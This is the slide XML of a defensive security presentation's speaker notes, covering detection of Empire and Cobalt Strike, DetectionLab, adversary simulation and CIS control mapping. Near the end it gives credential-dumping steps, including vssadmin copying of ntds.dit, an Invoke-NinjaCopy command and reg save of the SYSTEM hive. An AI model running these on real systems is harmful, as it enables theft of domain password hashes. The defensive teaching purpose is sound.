          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215097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will show Inveigh Responder and then Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InjectedThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to detect Empire in memory that had an injected process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defenders can use PowerShell to detect obfuscation and injected processes that Empire uses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell Empire uses a default agent string that is detectable via network monitoring.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> For example, an attacker might call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to allocate space for malicious code to execute, and then utilize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or another API call to execute the malicious code within another application. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetInjectedThreads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will retrieve the start address of each active thread, then determine the associated section properties. If there is an observed executable running within this section, it is deemed to be injected. But keep in mind that some legitimate applications perform process injection (and you might also run across an injected thread and alert).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CobaltStrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: https://github.com/JPCERTCC/aa-tools Volatility</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="764693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to End if no more time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next Slide is Caldera and attacking developing defenses.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2865081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are done with protections, logs, and cheat sheets then attack lets look at it in detection Lab and then add to our progress.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://medium.com/@clong/introducing-detection-lab-61db34bed6ae</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/clong/DetectionLab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322173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yea user clicks on Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> email attachment and enables the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to run… Ok that happens…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Let’s focus on not berating the user for clicking rather lets enable the computer to detect when that action happens and collect that data to better protect the computer and out environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://threatexpress.com/2018/06/threat-gets-a-vote-applying-a-threat-based-approach-to-security-testing/</a:t>
            </a:r>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2424705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https://medium.com/@clong/introducing-detection-lab-61db34bed6ae</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/clong/DetectionLab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or just build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>noSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and dump everything into it and have a data scientist build queries/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3220093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Caldera YouTube: https://www.youtube.com/watch?v=xjDrWStR68E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https://github.com/clong/DetectionLab</a:t>
            </a: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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162730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Caldera YouTube: https://www.youtube.com/watch?v=xjDrWStR68E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https://github.com/clong/DetectionLab</a:t>
            </a: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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41472549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Caldera YouTube: https://www.youtube.com/watch?v=xjDrWStR68E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https://github.com/clong/DetectionLab</a:t>
            </a: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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3688236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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2028684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CIS-CAT (Remediation) | Cheat-Sheets | Attack-Confirm Defense (New-Attacks &amp; Theories) | Measure –Repeat!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ATT&amp;CK and groups to find new attack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 CS, Empire, Metasploit, Caldera to simulate attack and check defenses caught it. If not then find out why! And harden.</a:t>
            </a:r>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3474525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solidFill>
              </a:rPr>
              <a:t>Enable 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solidFill>
              </a:rPr>
              <a:t>Monitor your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>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F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create Secure Configurations for your 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F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Patch your Software and OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Or Place in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Enclave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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solidFill>
              </a:rPr>
              <a:t>Lastly S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imulate Adversary Tactics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to obtain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mechanisms (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>behaviors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to create more monitors/detections.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Free Tools to Review/Monitor/Log: MSFT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, built-in Windows Audit logs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> line auditing, and PowerShell, Registry Monitoring (turn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My Wiki: https://wiki.cac.washington.edu/display/~moorej1@washington.edu/IR+Sandbox+Powershell+Obfuscation+and+Detection+Techniques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PowerShell v5 Security Enhancements &amp; AD Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://adsecurity.org/?p=2277</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your vendor for best practices or free tools that come with contract such as ATP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BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Map AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/BloodHoundAD/BloodHound</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MSFT cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://cloudblogs.microsoft.com/microsoftsecure/2018/08/13/cybersecurity-threats-how-to-discover-remediate-and-mitigate/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https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4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RegMon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: http://leelusoft.altervista.org/registry-live-watch.html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https://sourceforge.net/projects/regshot/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Team should have a mission and plan to guide them what is important to business. Could implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Framework,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
              <a:t> Or Map the CIS Controls (core of NIST) to objectives. Map those to Tickets to track events related to controls for later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rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Framework (CSF) Core: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Identify, Protect, Detect, Respond, Recover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For an example of Detection Response team mappings: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Protect: CIS 3, Secure Configuration of End-User Devices </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Detect: CIS 4, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Continuus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Vulnerability Assessment &amp; Remediation </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Respond: CIS 6, Maintenance, Monitoring, and Analysis of Audit Logs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3094996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 questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31279348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Need to copy the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> file using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>vssadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> c:\windows\ntds.dit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OR just use Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NinjaCopy</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.\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>localdestination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> c:\test\system -verbose -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>computername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workstationvm</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https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/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https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Then, you need the SYSTEM registry hive. Luckily, this can be directly saved, by running –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>reg save HKLM\SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;YOUR OUTPUT PATH HERE&gt;</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that we’ve got both of those files, we can start extracting hashes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>With the system extract and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> copy in hand, fire up PowerShell, it’s time for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
